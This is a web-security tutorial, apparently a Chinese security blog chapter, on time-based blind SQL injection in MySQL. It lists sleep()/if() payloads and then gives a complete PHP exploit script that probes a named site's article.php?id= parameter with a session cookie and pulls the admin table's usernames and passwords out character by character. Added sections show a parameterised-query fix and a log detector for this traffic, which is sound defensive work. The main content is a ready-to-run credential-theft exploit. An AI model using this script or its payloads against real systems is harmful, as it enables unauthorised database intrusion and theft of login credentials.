[Original] Web Security, Chapter 7: Exp Writing, Part 08: Writing a Time-Based Injection Exp
1. Introduction
Time-based injection is another form of blind injection: a SQL statement is used to make the database delay its response. In MySQL the function used is sleep(); `select sleep(3)` makes the database wait 3 seconds before returning. Combining this function with if() for a conditional test gives time-based injection, from which data can be extracted.
When an injection statement with a delay is constructed and the condition holds, the time from the start of the request to its end is necessarily five seconds or more.
2. Time-based injection statements
PHP example of measuring a delay:
```php
<?php
$time1 = time();
sleep(10);
$time2 = time();
print $time2-$time1;
?>
```
MySQL delay statement:
```sql
select if('root'='root',sleep(3),0)
```
Length of the data:
```sql
select if(LENGTH((select GROUP_CONCAT(username,0x3a,password)from admin))=38,sleep(5),0)
```
ASCII code of each character:
```sql
select if(ascii(substring((select GROUP_CONCAT(username,0x3a,password)from admin),1,1))=105,sleep(5),0)
```
What is the principle behind time-based injection?
It uses MySQL's sleep() to delay the query, and the time the web page takes to respond is judged against that database delay.
If the condition being tested is true, the response is delayed by five seconds.
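The delay only becomes an oracle because the request parameter is parsed as SQL. The following is an added example, not code from the original post, showing the vulnerable PHP query pattern beside its parameterised form; the table and column names (article, id, title) are assumptions, and the demonstration runs offline against an in-memory SQLite database with constructed data.

```php
<?php
// Added example (not from the original post). Table/column names are assumed.

// Vulnerable: the request parameter is concatenated into the SQL text, so an id
// such as "1 and if(ascii(...)=105,sleep(5),0)" is parsed and executed as SQL,
// and the page's response time becomes the oracle described above.
function fetch_article_vulnerable(PDO $db, string $id): ?array {
    $sql = "SELECT id, title FROM article WHERE id=" . $id;   // do not do this
    $row = $db->query($sql)->fetch(PDO::FETCH_ASSOC);
    return $row === false ? null : $row;
}

// Hardened: the value is validated as an integer and bound as a parameter, so
// it travels as data and is never parsed as SQL. The same payload fails
// validation; even a bound string payload would simply match no row.
function fetch_article_safe(PDO $db, string $id): ?array {
    if (!ctype_digit($id)) {
        return null;
    }
    $stmt = $db->prepare("SELECT id, title FROM article WHERE id = :id");
    $stmt->bindValue(':id', (int)$id, PDO::PARAM_INT);
    $stmt->execute();
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    return $row === false ? null : $row;
}

// Offline demonstration with constructed data. Against MySQL the functions are
// identical; only the DSN changes, e.g.
//   new PDO('mysql:host=127.0.0.1;dbname=app', 'user', 'pass',
//           [PDO::ATTR_EMULATE_PREPARES => false]);   // real server-side prepares
$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec("CREATE TABLE article (id INTEGER PRIMARY KEY, title TEXT)");
$db->exec("INSERT INTO article (id, title) VALUES (1, 'hello')");

// The character-test statement from the post, as it would arrive in ?id=
$payload = "1 and if(ascii(substring((select GROUP_CONCAT(username,0x3a,password) from admin),1,1))=105,sleep(5),0)";

var_dump(fetch_article_safe($db, '1'));       // array with id 1, title 'hello'
var_dump(fetch_article_safe($db, $payload));  // NULL: rejected before any SQL runs

// The vulnerable version hands the input straight to the SQL parser. On MySQL it
// would call sleep(5) whenever the condition holds; SQLite has no sleep()/if(),
// so here it throws, which still shows that attacker text reached the parser.
try {
    fetch_article_vulnerable($db, $payload);
} catch (PDOException $e) {
    echo "vulnerable query executed attacker-controlled SQL: " . $e->getMessage() . "\n";
}
```

Binding parameters removes the oracle entirely; shortening timeouts does not, since the attacker can choose any delay the server tolerates. As defence in depth on MySQL 5.7 and later, the `max_execution_time` session variable (milliseconds) caps how long a SELECT may run, which limits how much a single request can be stalled.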
3. Writing the exp
```php
<?php
// Parameter 1: URL to request; parameter 2: POST data (GET if empty);
// parameter 3: cookies to send; parameter 4: whether to return cookies
function curl_request($url, $post = '', $cookie = '', $returnCookie = 0) {
    $curl = curl_init();
    curl_setopt($curl, CURLOPT_URL, $url);
    curl_setopt($curl, CURLOPT_USERAGENT, 'Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0)');
    curl_setopt($curl, CURLOPT_FOLLOWLOCATION, 1);
    curl_setopt($curl, CURLOPT_AUTOREFERER, 1);
    curl_setopt($curl, CURLOPT_REFERER, "http://XXX");
    if ($post) {
        curl_setopt($curl, CURLOPT_POST, 1);
        curl_setopt($curl, CURLOPT_POSTFIELDS, http_build_query($post));
    }
    if ($cookie) {
        curl_setopt($curl, CURLOPT_COOKIE, $cookie);
    }
    curl_setopt($curl, CURLOPT_HEADER, $returnCookie);
    curl_setopt($curl, CURLOPT_TIMEOUT, 10);
    curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1);
    $data = curl_exec($curl);
    if (curl_errno($curl)) {
        return curl_error($curl);
    }
    curl_close($curl);
    if ($returnCookie) {
        // Split headers from body and pull the first Set-Cookie value
        list($header, $body) = explode("\r\n\r\n", $data, 2);
        preg_match_all("/Set\-Cookie:([^;]*);/", $header, $matches);
        $info = array();
        $info['cookie'] = substr($matches[1][0], 1);
        $info['content'] = $body;
        return $info;
    } else {
        return $data;
    }
}

// Determine the length of the data: the first length whose request takes
// at least 5 seconds is the answer
function getstrlen($url, $cookie) {
    $data_len = '';
    $i = 1;
    while (true) {
        $s = "%20and%20if(LENGTH((select%20GROUP_CONCAT(username,0x3a,password)from%20admin))={$i},sleep(5),0)";
        $start_time = time();
        $urlexp = $url . $s;
        $html = exploit($urlexp, $cookie);
        if ((time() - $start_time) >= 5) {
            $data_len = $i;
            break;
        }
        $i++;
    }
    return $data_len;
}

function exploit($url, $cookie) {
    $html = curl_request($url, '', $cookie);
    return $html;
}

// 38 is the length found by getstrlen() in the run shown below
// Recover the data one character at a time by testing ASCII codes 1..125
function get_data($url, $cookie, $datalen) {
    $admin_pass = '';
    for ($i = 1; $i <= $datalen; $i++) {
        for ($j = 1; $j <= 125; $j++) {
            $s = "%20and%20if(ascii(substring((select%20GROUP_CONCAT(username,0x3a,password)from%20admin),{$i},1))={$j},sleep(5),0)";
            $start_time = time();
            $html = exploit($url . $s, $cookie);
            if ((time() - $start_time) >= 5) {
                $c = chr($j);
                $admin_pass .= $c;
                echo $admin_pass . "\r\n";
                break;
            }
        }
    }
    return $admin_pass;
}

$cookie = 'PHPSESSID=lkmi6apekkpfvemo5mnmf7opk7';
$url = 'http://www.moontester.com/article.php?id=1';
// Used for comparison
//$tmp_html = exploit($url, $cookie);
$datalen = getstrlen($url, $cookie);
if ($datalen) {
    echo "[+]" . $datalen . "[+]\r\n";
    echo get_data($url, $cookie, $datalen);
} else {
    echo "data null";
}
```
Fill in the login cookie and the injection URL, then run the script. getstrlen() uses the time difference to determine that the length is 38; 38 is then passed to get_data(), which tests each position's ASCII code, converts each determined code to a character, and concatenates them to produce the final result.
Run result (screenshot in the original post): the script prints the length 38, then the recovered string, growing by one character per line.
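Seen from the server side, the run described above leaves a distinctive trace: one client sending a long series of requests to the same page, each carrying sleep() in the query string and each taking about five seconds. The following is an added example, not code from the original post, that flags that pattern in access-log lines. The log lines are constructed here for illustration, and the assumed format is an nginx-style access log whose last field is $request_time in seconds.

```php
<?php
// Added example (not from the original post): detection of time-based injection
// traffic in an access log. Log format and sample lines are assumptions.

const SLOW_SECONDS = 4.0;   // the exp waits for >= 5 s; allow some slack for clock skew
const SLOW_BURST   = 3;     // this many slow hits from one client to one path is suspicious

// Constructed sample lines: a normal hit, three requests from the exp above, a normal hit
$logLines = [
    '203.0.113.5 - - [10/Oct/2023:13:55:36 +0000] "GET /article.php?id=1 HTTP/1.1" 200 4096 0.012',
    '203.0.113.5 - - [10/Oct/2023:13:55:41 +0000] "GET /article.php?id=1%20and%20if(LENGTH((select%20GROUP_CONCAT(username,0x3a,password)from%20admin))=38,sleep(5),0) HTTP/1.1" 200 4096 5.004',
    '203.0.113.5 - - [10/Oct/2023:13:55:47 +0000] "GET /article.php?id=1%20and%20if(ascii(substring((select%20GROUP_CONCAT(username,0x3a,password)from%20admin),1,1))=105,sleep(5),0) HTTP/1.1" 200 4096 5.003',
    '203.0.113.5 - - [10/Oct/2023:13:55:53 +0000] "GET /article.php?id=1%20and%20if(ascii(substring((select%20GROUP_CONCAT(username,0x3a,password)from%20admin),2,1))=100,sleep(5),0) HTTP/1.1" 200 4096 5.002',
    '198.51.100.7 - - [10/Oct/2023:13:56:01 +0000] "GET /article.php?id=2 HTTP/1.1" 200 3980 0.015',
];

// Parse one line into ip, method, path, decoded query string, status and request time
function parse_line(string $line): ?array {
    $re = '/^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3}) (\d+|-) ([\d.]+)$/';
    if (!preg_match($re, $line, $m)) {
        return null;
    }
    $path  = parse_url($m[4], PHP_URL_PATH);
    $query = parse_url($m[4], PHP_URL_QUERY);
    return [
        'ip'     => $m[1],
        'method' => $m[3],
        'path'   => is_string($path) ? $path : $m[4],
        'query'  => is_string($query) ? urldecode($query) : '',
        'status' => (int)$m[5],
        'time'   => (float)$m[7],
    ];
}

// sleep() and benchmark() are the MySQL delay primitives this class of injection relies on
function has_delay_function(string $decodedQuery): bool {
    return preg_match('/\b(sleep|benchmark)\s*\(/i', $decodedQuery) === 1;
}

// Two independent signals: a delay primitive in the decoded query (content), and
// repeated slow responses from one client to one path (timing), which also
// catches payloads that obfuscate the function name.
function analyse(array $lines): array {
    $findings = [];
    $slowByClient = [];
    foreach ($lines as $line) {
        $r = parse_line($line);
        if ($r === null) {
            continue;
        }
        if (has_delay_function($r['query'])) {
            $findings[] = sprintf('%s: delay function in query to %s (%.3fs)', $r['ip'], $r['path'], $r['time']);
        }
        if ($r['time'] >= SLOW_SECONDS) {
            $key = $r['ip'] . ' ' . $r['path'];
            $slowByClient[$key] = ($slowByClient[$key] ?? 0) + 1;
        }
    }
    foreach ($slowByClient as $key => $n) {
        if ($n >= SLOW_BURST) {
            $findings[] = sprintf('%s: %d responses slower than %.1fs', $key, $n, SLOW_SECONDS);
        }
    }
    return $findings;
}

foreach (analyse($logLines) as $f) {
    echo "[!] $f\n";   // prints three content findings and one timing finding for 203.0.113.5
}
```

The timing signal is the more robust of the two, because the exp has to wait for the delay on every positive test regardless of how the payload is encoded; in production the per-client counter would be kept over a sliding window rather than a whole file.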
Original article, author: mOon. If reproduced, please credit the source: https://www.moonsec.com/567.html